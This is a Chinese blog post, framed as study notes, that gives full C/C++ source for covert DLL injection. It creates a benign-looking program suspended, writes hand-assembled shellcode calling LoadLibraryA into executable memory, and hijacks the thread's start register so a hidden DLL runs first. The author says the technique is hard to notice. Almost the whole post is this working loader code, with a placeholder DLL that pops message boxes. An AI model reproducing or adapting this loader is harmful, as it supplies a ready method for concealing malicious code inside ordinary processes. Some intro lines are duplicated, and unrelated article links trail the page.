EXE1调用EXE2来加载DLL实现隐藏功能
2014-02-25 22:23
435 查看
这种方法不易察觉,其实还能做出很多其他的类型,这里只是学习··································
自己修改了下结构········································
主CPP ExeOfShellcodeDllInject 代码:
将 OrdinaryMsg.exe shellcodeDLLInject.dll 和主EXE放在同一目录下可以运行成功
OrdinaryMsg.exe 代码:
最后效果为;
Context.Eip = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction); 改为 Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction); 线程在ring3的第一行代码时,Eax存放的是线程函数起始地址 这个应该更稳妥的,主线程暂停在ntdll空间,由ntdll->EXE入口点 中间还干了事,学习于 http://bbs.pediy.com/showthread.php?t=159536
自己修改了下结构········································
主CPP ExeOfShellcodeDllInject 代码:
#include "stdafx.h"
#include <Windows.h>
typedef struct tempData
{
char szInjectDllPath[MAX_PATH];
char szShllcode[MAX_PATH];
};
char ShellCode[] = {0x60,0x68,0x78,0x56,0x34,0x12,0xB8,0x78,0x56,0x34,0x12,0xFF,0xD0,0x61,0xE9,0x78,0x56,0x34,0x12};
//pushad
//push 0x12345678
//mov eax,0x12345678
//call eax
//popad
//jmp 0xXXXXXXXX
struct tempData g_data = {0x0};
int _tmain(int argc, _TCHAR* argv[])
{
//初始化结构体中的两个结构 DLL路径+shellcode
strcpy(g_data.szInjectDllPath,"shellcodeDLLInject.dll");
strcpy(g_data.szShllcode,ShellCode);
char szExePath[] = "OrdinaryMsg.exe";
//PathRemoveFileSpec(szExePath);
STARTUPINFO si = {sizeof(si)};
PROCESS_INFORMATION pi = {0};
CONTEXT context;
//生成暂停EXE去做事情
if (!CreateProcess(szExePath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi))
{
printf("找不到exe\n");
return 0;
}
//设置 CONTEXT_INTEGER 才能得到寄存器值
context.ContextFlags = CONTEXT_INTEGER;
GetThreadContext(pi.hThread,&context);
LPVOID lpData = VirtualAllocEx(pi.hProcess,NULL,sizeof(g_data)+1,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (lpData == NULL)
{
printf("申请内存失败!\n");
return 0;
}
*(DWORD*)(g_data.szShllcode+0x2) = (DWORD)lpData;
*(DWORD*)(g_data.szShllcode + 0x7) = (DWORD)LoadLibraryA;
*(DWORD*)(g_data.szShllcode + 15) = (DWORD)(context.Eax - (DWORD)((char*)lpData + sizeof(MAX_PATH)+ 14) -5 );
//这里面的14为 g_data.szShllcode 起始到最后一个需要修改处的长度
if (!WriteProcessMemory(pi.hProcess,lpData,&g_data,sizeof(g_data),NULL))
{
printf("写入内存失败!\n");
return 0;
}
context.Eax = (DWORD)(((tempData*)lpData)->szShllcode);
ResumeThread(pi.hThread);
return 0;
}将 OrdinaryMsg.exe shellcodeDLLInject.dll 和主EXE放在同一目录下可以运行成功
OrdinaryMsg.exe 代码:
#include "stdafx.h"
#include <Windows.h>
#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )
int main(int argc, _TCHAR* argv[])
{
//FreeConsole();
MessageBox(NULL,"OrdinaryMsg","OrdinaryMsg",MB_OK);
//AllocConsole();
return 0;
}shellcodeDLLInject.dll 代码:#include "stdafx.h"
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
DisableThreadLibraryCalls(hModule);
MessageBox(NULL,TEXT("DLL中非法操作"),TEXT("DLL中非法操作"),MB_OK);
break;
case DLL_PROCESS_DETACH:
MessageBox(NULL,TEXT("DLL中非法操作完毕"),TEXT("DLL中非法操作完毕"),MB_OK);
break;
}
return TRUE;
}最后效果为;
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Android JNI知识简介
- LXC安装和配置(源码安装)
- firefox插件开发
- 父节点获取子节点的字符串
- 父节点获取子节点的字符串
- JAVA面试题
- 黑马程序员-----java集合类
- Struts2复习之OGNL(2)
- os模块
- 如何在DataTable中查找数据 Dataview检索数据
- [转载] 虚拟化管理软件比较
- fstab文件中挂载/dev/mtdblock设备不行!
- linux中select()函数分析
- JavaEE项目切换到Intellij遇到的一个问题
- J2EE的13种核心技术
- webkit在vs2008中编译
- Java中字符串相等与大小比较
- JSP内置对象
- Java中字符串相等与大小比较
- Docker简要操作